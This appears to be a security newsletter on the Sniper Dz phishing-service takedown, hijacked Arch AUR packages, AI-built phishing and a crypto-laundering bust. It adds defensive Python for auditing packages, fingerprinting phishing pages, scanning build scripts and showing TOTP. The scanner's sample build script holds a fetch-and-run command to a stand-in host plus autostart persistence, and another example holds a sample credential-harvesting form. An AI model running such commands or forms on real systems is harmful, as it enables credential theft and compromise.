INTERPOL Just Arrested 201 People Running a Phishing Store

Operation Ramz took down Sniper Dz — a platform that let anyone rent a complete phishing kit for a few dollars a month. 201 arrests across 13 countries. Plus: 400+ Arch Linux packages hijacked to steal credentials, and Europol dismantles a €336M crypto laundering service.


🌐 World Intel

400+ Arch Linux Packages Hijacked to Steal Credentials and Install a Hidden Rootkit

Attackers took over more than 400 packages in the Arch Linux User Repository (AUR) by exploiting abandoned or poorly maintained accounts. They modified the build scripts — instructions that compile the software from source code — to install a Rust-based credential stealer. When run with administrator privileges, the stealer also deploys an eBPF rootkit that actively conceals itself from security tools running on the same machine. AUR packages are community-maintained and don't go through the same vetting as official Arch packages — this is a known risk of the ecosystem, and the attack hit at scale. Arch Linux users should audit all AUR packages installed in the past 30 days.

Source: The Hacker News

Google Sues Chinese Network for Using Gemini AI to Build Mass Phishing Campaigns

Google filed a lawsuit against a Chinese cybercrime network it says used the Gemini AI platform to generate convincing smishing pages and send mass phishing texts impersonating well-known American brands. The attackers used Gemini to produce realistic fake login pages at speed — a task that would have required skilled designers doing manual work in years past. Google's complaint centers on terms-of-service violations and seeks to establish legal precedent around AI-assisted fraud. It's one of the first lawsuits to specifically name generative AI as the tool of crime rather than a passive enabler.

Source: The Hacker News

Europol Dismantles AudiA6 — Cryptocurrency Laundering Service for Ransomware Gangs

Europol announced the takedown of AudiA6, a cryptocurrency money laundering service used by ransomware gangs to clean their proceeds. AudiA6 had processed an estimated €336 million (~$389 million) since launching in 2021. The service functioned as a middleman: ransomware operators sent cryptocurrency to AudiA6, which mixed and converted it through layers of transactions to obscure its origin. Europol arrested the operators and seized infrastructure. The takedown removes a key financial artery for multiple ransomware groups simultaneously — unlike targeting individual gangs, disrupting the laundering layer hits all their customers at once.

Source: The Hacker News

⚔️ Active Attacks

INTERPOL Operation Ramz: 201 Arrested, Sniper Dz Phishing Platform Taken Down

INTERPOL coordinated a takedown of Sniper Dz — a phishing-as-a-service platform that had been operating since 2015 and collected over 45,000 victim records. Operation Ramz resulted in 201 arrests across 13 countries. Sniper Dz let criminals rent complete phishing kits — fake login pages, victim tracking dashboards, and management tools — without needing any technical skills to set them up. The platform charged a monthly fee, similar to any subscription software service. When INTERPOL analyzed the victim data, they found credentials from banks, corporate email systems, and social media accounts across dozens of countries.

What you can do: If you received a suspicious login alert or noticed an unauthorized login between 2015 and today on a major account, change that password. Enable multi-factor authentication (MFA) on any account that supports it. Phishing-as-a-service victims are often unaware their credentials were stolen until they show up in a breach database — check haveibeenpwned.com to see if your email appears in known breaches.

Source: The Hacker News

🔓 New Vulnerabilities

AUR (Arch Linux User Repository), 400+ packages — Supply Chain Compromise  ·  Critical — actively exploited

Over 400 packages in the Arch Linux AUR were modified to deliver a credential stealer and eBPF rootkit. The AUR is community-maintained and explicitly carries higher risk than official Arch repositories. This is a supply chain attack exploiting weak account security on package maintainer accounts.

Arch Linux users: audit AUR packages from the past 30 days. Check the Arch Linux security advisories for the list of affected package names. Prefer official repository packages where possible. Enable 2FA on AUR maintainer accounts if you maintain packages.
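The 30-day audit the advisory asks for can be scripted. The following is an added example written for this newsletter, not code from the article or from Arch Linux. It assumes `pacman -Qm` lists the packages that come from no configured repository (on a typical Arch system, the locally built AUR set) and that `pacman -Qi` run in the C locale prints `Install Date` as `Thu Mar  6 10:15:00 2025`; the live helper forces `LC_ALL=C` for that reason. The `pacman -Qi` text embedded below is a constructed sample so the parser and filter run on any machine.

```python
"""Find foreign (AUR) packages installed in the last 30 days on Arch Linux.

Added example for this newsletter; not code from the article or from Arch
Linux. Assumes pacman's `-Qi` output in the C locale for the date format.
"""
import os
import shutil
import subprocess
from datetime import datetime, timedelta

# Constructed sample of `LC_ALL=C pacman -Qi <pkg>...` output for two packages.
SAMPLE_QI = """\
Name            : example-aur-tool
Version         : 1.4.2-1
Description     : constructed sample package
Install Date    : Mon Mar  3 09:15:00 2025
Validated By    : None

Name            : example-old-helper
Version         : 0.9-2
Description     : constructed sample package
Optional Deps   : example-dep: adds something
                  other-dep: adds something else
Install Date    : Wed Jan 10 20:00:00 2024
Validated By    : None
"""

DATE_FMT = "%a %b %d %H:%M:%S %Y"  # what strftime("%c") produces in the C locale
DEMO_NOW = datetime(2025, 3, 20, 12, 0, 0)  # constructed "today" for the sample


def parse_qi(text):
    """Parse `pacman -Qi` output into dicts with name, version and installed (datetime)."""
    packages, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                packages.append(current)
                current = {}
            continue
        if line[0].isspace():
            continue  # continuation of a multi-line field such as Optional Deps
        key, _, value = line.partition(":")  # keys never contain ':', values may
        key, value = key.strip(), value.strip()
        if key == "Name":
            current["name"] = value
        elif key == "Version":
            current["version"] = value
        elif key == "Install Date":
            current["installed"] = datetime.strptime(value, DATE_FMT)
    if current:
        packages.append(current)
    return packages


def recently_installed(packages, now, days=30):
    """Return packages whose install date falls within the last `days` days, newest first."""
    cutoff = now - timedelta(days=days)
    return sorted(
        (p for p in packages if "installed" in p and p["installed"] >= cutoff),
        key=lambda p: p["installed"],
        reverse=True,
    )


def audit_live_system(days=30):
    """Run the audit against the real system; returns [] where pacman is not installed."""
    if shutil.which("pacman") is None:
        return []
    env = dict(os.environ, LC_ALL="C")
    # -Qm: packages not found in any configured repository; -q: names only.
    foreign = subprocess.run(["pacman", "-Qmq"], capture_output=True, text=True,
                             env=env, check=True).stdout.split()
    if not foreign:
        return []
    info = subprocess.run(["pacman", "-Qi", *foreign], capture_output=True,
                          text=True, env=env, check=True).stdout
    return recently_installed(parse_qi(info), datetime.now(), days)


if __name__ == "__main__":
    for pkg in recently_installed(parse_qi(SAMPLE_QI), DEMO_NOW):
        print(f"sample: {pkg['name']} {pkg['version']} installed {pkg['installed']:%Y-%m-%d}")
    for pkg in audit_live_system():
        print(f"live:   {pkg['name']} {pkg['version']} installed {pkg['installed']:%Y-%m-%d}")
```

The listing is a starting point for the audit, not a verdict: each package it names still needs its PKGBUILD and any bundled scripts compared against the upstream project, and rebuilt from a trusted revision if anything unexplained was added.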

Gemini AI (structural risk) — Misuse for Phishing Page Generation  ·  Medium — terms-of-service violation, platform-level

Not a technical vulnerability in Gemini — rather, systematic misuse of the AI platform to generate convincing phishing pages at scale. AI-generated phishing content is significantly harder to detect than template-based attacks because each generation can be slightly different, evading pattern-based filters.

AI-assisted phishing is increasingly indistinguishable from legitimate communications. Rely less on appearance alone; verify requests for credentials or payments through an independent channel.
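The point about pattern-based filters can be made concrete. The following is an added example written for this newsletter, not code from the article or from any vendor: it hashes two constructed variants of one credential-harvesting page (different wording, styling and field order, as a generator would produce) and shows that the exact hash differs while a fingerprint of the credential form itself (which host it posts to, which non-hidden fields it asks for, whether one is a password) stays the same. The page markup, the brand name `ExampleBank` and the `.invalid` hostnames are all constructed.

```python
"""Structural fingerprint of a login page versus exact-match hashing.

Added example for this newsletter, not code from the article or from any
vendor. Pages, brand and hostnames are constructed (.invalid never resolves).
"""
import hashlib
import json
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormCollector(HTMLParser):
    """Collect <title>, the first <form> action and its non-hidden <input> fields."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self._in_title = False
        self.action = None
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "form" and self.action is None:
            self.action = a.get("action", "")
        elif tag == "input" and a.get("type", "text") != "hidden":
            self.inputs.append((a.get("type", "text").lower(), (a.get("name") or "").lower()))

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def exact_hash(html):
    """What a template blocklist typically keys on: the exact bytes of the page."""
    return hashlib.sha256(html.encode()).hexdigest()


def fingerprint(html):
    """Where the credential form posts and what it asks for, independent of wording."""
    p = _FormCollector()
    p.feed(html)
    fields = tuple(sorted(p.inputs))
    return {
        "submit_host": urlparse(p.action or "").hostname or "",
        "fields": fields,
        "asks_password": any(t == "password" for t, _ in fields),
        "title": " ".join(p.title.split()),
    }


def fingerprint_id(html):
    """Short id of the form structure only; title excluded so copy changes don't matter."""
    fp = fingerprint(html)
    key = json.dumps([fp["submit_host"], fp["fields"], fp["asks_password"]])
    return hashlib.sha256(key.encode()).hexdigest()[:16]


def brand_mismatch(html, brand, legit_hosts):
    """Flag a page that names `brand`, asks for a password, and posts to a non-brand host."""
    fp = fingerprint(html)
    mentions_brand = brand.lower() in fp["title"].lower()
    posts_to_brand = any(fp["submit_host"] == h or fp["submit_host"].endswith("." + h)
                         for h in legit_hosts)
    return mentions_brand and fp["asks_password"] and not posts_to_brand


# Constructed: two generated variants of one phishing page, and the brand's real page.
VARIANT_A = """<html><head><title>Sign in to ExampleBank Online</title></head><body>
<form action="https://examplebank-secure-verify.invalid/post" method="post">
<input type="text" name="username"><input type="password" name="password">
<button>Sign in</button></form></body></html>"""

VARIANT_B = """<html><head><title>ExampleBank - Secure Login</title>
<style>body{font-family:sans-serif}</style></head><body>
<p>Please confirm your details to keep your account active.</p>
<form class="login" action="https://examplebank-secure-verify.invalid/post" method="post">
<input type="hidden" name="session" value="c0ffee">
<input type="password" name="Password" placeholder="Password">
<input type="text" name="Username" placeholder="User name">
<button>Continue</button></form></body></html>"""

LEGIT = """<html><head><title>ExampleBank Online Banking</title></head><body>
<form action="https://online.examplebank.invalid/login" method="post">
<input type="text" name="username"><input type="password" name="password">
</form></body></html>"""

if __name__ == "__main__":
    print("same exact hash:  ", exact_hash(VARIANT_A) == exact_hash(VARIANT_B))
    print("same fingerprint: ", fingerprint_id(VARIANT_A) == fingerprint_id(VARIANT_B))
    for name, page in [("A", VARIANT_A), ("B", VARIANT_B), ("legit", LEGIT)]:
        print(name, "brand mismatch:", brand_mismatch(page, "ExampleBank", ["examplebank.invalid"]))
```

The brand check is one signal rather than a verdict: a legitimate page that hands login to a separate identity provider also posts to a different host, so the allow-list of `legit_hosts` has to include the brand's real SSO hosts before this is used to block anything.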

AudiA6 (criminal service) — Cryptocurrency Laundering Infrastructure  ·  High impact — taken down by Europol

AudiA6 processed €336 million in criminal cryptocurrency since 2021. Its disruption removes a shared financial service layer that multiple ransomware and cybercrime groups depended on, potentially disrupting their ability to convert cryptocurrency proceeds into usable funds.

No direct user action needed. The takedown demonstrates that financial infrastructure disruption is an effective law enforcement strategy against the ransomware ecosystem.

🛠 New Tech

The AUR supply chain attack is a reminder that open-source package ecosystems need better account security. Several tools are emerging to help. Socket.dev analyzes npm, PyPI, and other packages for malicious behavior before you install them — it looks for things like new network connections, file system writes, and changed maintainers that weren't there before. Sigstore is a free, open standard for cryptographically signing software packages, so developers and users can verify a package was published by the person who actually owns the project. Major ecosystems including npm, Python, and Maven are adopting Sigstore signing. For organizations that depend on open-source software, requiring packages to be Sigstore-signed is becoming a practical baseline policy, not a future aspiration.
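The checks the paragraph attributes to tools like Socket.dev (a changed maintainer, network activity that was not there before, writes outside the package) can be applied to an AUR build script directly. The following is an added example written for this newsletter; it is not code from the article, from Arch Linux or from Socket.dev. It compares a before/after pair of PKGBUILDs, both constructed along with every hostname in them, and reports only on lines that are new in the later revision. The rules are heuristics, so each finding is a prompt to read the diff, not a verdict.

```python
"""Heuristic review of a changed AUR build script (PKGBUILD).

Added example for this newsletter; not from the article, Arch Linux or
Socket.dev. Both PKGBUILDs and their hostnames are constructed.
"""
import re

OLD_PKGBUILD = """\
# Maintainer: Original Author <original@example.invalid>
pkgname=example-tool
pkgver=1.2.0
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""

NEW_PKGBUILD = """\
# Maintainer: Someone Else <new@example.invalid>
pkgname=example-tool
pkgver=1.2.1
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")

build() {
  cd "$pkgname-$pkgver"
  curl -fsSL https://updates.example.invalid/setup | base64 -d | sh
  make
}

package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  install -Dm755 helper "$HOME/.config/autostart/helper"
}
"""

FUNC_RE = re.compile(r"^(\w+)\s*\(\)\s*\{\s*$")          # e.g. "package() {"
FETCH_RE = re.compile(r"\b(curl|wget|git\s+clone)\b")     # downloads not in source=()
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(ba)?sh\b")           # "... | sh" / "... | bash"
OUTSIDE_PKGDIR_RE = re.compile(r"(\$HOME|~/|/etc/|/usr/|/root/|\$XDG_)")
WRITE_CMD_RE = re.compile(r"^\s*(cp|mv|install|tee|ln|chmod|systemctl|crontab)\b|>>?\s*\S")


def maintainers(text):
    """Names listed on '# Maintainer:' / '# Co-Maintainer:' comment lines."""
    return set(re.findall(r"^#\s*(?:Co-)?Maintainer:\s*(.+)$", text, re.M))


def functions(text):
    """Map function name -> body lines; a function closes with '}' at column 0."""
    out, lines, i = {}, text.splitlines(), 0
    while i < len(lines):
        m = FUNC_RE.match(lines[i])
        if not m:
            i += 1
            continue
        body, i = [], i + 1
        while i < len(lines) and lines[i].rstrip() != "}":
            body.append(lines[i])
            i += 1
        out[m.group(1)] = body
        i += 1
    return out


def scan_pkgbuild(old, new):
    """Return (rule, detail) findings for what the new revision adds over the old one."""
    findings = []
    old_m, new_m = maintainers(old), maintainers(new)
    if new_m != old_m:
        findings.append(("maintainer-changed", f"{sorted(old_m)} -> {sorted(new_m)}"))
    old_funcs = functions(old)
    for name, body in functions(new).items():
        old_body = set(old_funcs.get(name, []))
        for line in body:
            if line in old_body:
                continue  # only lines that are new in this revision are inspected
            s = line.strip()
            if FETCH_RE.search(s):
                findings.append(("fetch-outside-source-array", f"{name}(): {s}"))
            if PIPE_TO_SHELL_RE.search(s):
                findings.append(("pipe-to-shell", f"{name}(): {s}"))
            if (name == "package" and WRITE_CMD_RE.search(line)
                    and OUTSIDE_PKGDIR_RE.search(s) and "$pkgdir" not in s):
                findings.append(("write-outside-pkgdir", f"{name}(): {s}"))
    return findings


if __name__ == "__main__":
    for rule, detail in scan_pkgbuild(OLD_PKGBUILD, NEW_PKGBUILD):
        print(f"{rule:28} {detail}")
```

Run against two revisions of a package you already have, the scanner is quiet for routine version bumps (identical function bodies produce no findings) and speaks up exactly where a reviewer would want to look first: who now controls the package, and anything the build fetches or writes that the `source=()` array and `$pkgdir` do not account for.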

💡 Deep Dive

Phishing-as-a-Service: When Running a Scam Requires No Skills

Running a fishing operation used to require equipment: rods, lines, hooks, bait, a boat. You needed to know what you were doing. Phishing operations used to be similar — you needed to build convincing fake websites, set up infrastructure to collect credentials, write persuasive emails, and manage the technical side of staying online while law enforcement looked for you. That barrier kept the crime somewhat limited to people with real technical skills.

Phishing-as-a-service removes all of that.

Sniper Dz, taken down this week by INTERPOL's Operation Ramz, worked exactly like a subscription software product. You signed up, paid a monthly fee, chose from a menu of fake login pages impersonating banks, social media, and corporate email systems, pointed your victims at a provided link, and logged into a dashboard to see their stolen credentials arrive in real time. No coding. No server management. No design work. Just choose your target and start sending links.

The platform had been running since 2015. Over 11 years, it collected more than 45,000 victim records — credentials from real people at banks, companies, and social media platforms across the world. The monthly fee model meant Sniper Dz had recurring revenue, just like any legitimate SaaS company. Lowering the technical barrier to crime dramatically expanded who could participate.

INTERPOL coordinated the response across 13 countries. That's the other side of the story: international cybercrime enforcement is genuinely hard. A crime that starts in one country, routes through servers in three others, targets victims in a dozen more, and is operated by people in yet another jurisdiction requires every involved country to cooperate simultaneously. Operation Ramz got 13 countries to move together, resulting in 201 arrests.

The takedown is real. But it's also worth being clear-eyed about what follows. Sniper Dz will be replaced. It may already have successors. The demand for easy phishing-as-a-service platforms doesn't disappear because one platform does. The practical defense is the same it's always been: a stolen password is much less useful when multi-factor authentication is enabled. A phishing link that captures your credentials still fails if logging in also requires a code only you can see. Turn on MFA everywhere you can.
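The closing claim, that a harvested password fails on its own once a second factor is required, is shown below in working code. This is an added example written for this newsletter, not code from the article: it implements RFC 6238 TOTP on top of RFC 4226 HOTP using only the standard library, checks the SHA-1 test vectors published in those RFCs, and runs a login that accepts a request only when both the password and the current code are right. The user record, its password, its TOTP secret and the fixed clock are constructed.

```python
"""Why a phished password alone does not log in once TOTP MFA is on.

Added example for this newsletter, not code from the article. User, password,
secret and clock are constructed; the RFC secret only checks the math.
"""
import hashlib
import hmac
import struct
import time

RFC_TEST_SECRET = b"12345678901234567890"  # RFC 4226 / RFC 6238 reference key


def hotp(secret, counter, digits=6):
    """HOTP (RFC 4226): HMAC-SHA1 over the big-endian counter, dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, unix_time, step=30, digits=6):
    """TOTP (RFC 6238): HOTP with counter = floor(time / step)."""
    return hotp(secret, int(unix_time) // step, digits)


def verify_totp(secret, code, unix_time, window=1):
    """Accept the current 30 s step and `window` steps either side to absorb clock drift."""
    counter = int(unix_time) // 30
    return any(hmac.compare_digest(hotp(secret, counter + d), code)
               for d in range(-window, window + 1))


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


# Constructed user record: salted password hash plus a per-user TOTP secret.
USER_SALT = b"constructed-salt"
USER_SECRET = b"constructed-totp-secret-bytes"
USER_DB = {
    "alice": {
        "pw_hash": hash_password("correct horse battery staple", USER_SALT),
        "totp_secret": USER_SECRET,
    }
}


def login(username, password, code, now=None):
    """Both factors must pass; a harvested password without a valid code is rejected."""
    user = USER_DB.get(username)
    if user is None:
        return False
    now = time.time() if now is None else now
    password_ok = hmac.compare_digest(hash_password(password, USER_SALT), user["pw_hash"])
    code_ok = code is not None and verify_totp(user["totp_secret"], code, now)
    return password_ok and code_ok


if __name__ == "__main__":
    t = 1_700_000_000  # fixed clock for a repeatable demo
    phished = "correct horse battery staple"
    print("password only:   ", login("alice", phished, None, now=t))
    print("password + code: ", login("alice", phished, totp(USER_SECRET, t), now=t))
```

One caveat belongs next to the "code only you can see" framing: a TOTP code blocks replay of a password captured earlier, but a phishing proxy that relays the victim's submission to the real site in real time can forward the code inside its 30-second validity window. Factors bound to the site's origin (FIDO2/WebAuthn passkeys or hardware keys) close that gap, so prefer them where an account offers them and use TOTP everywhere else.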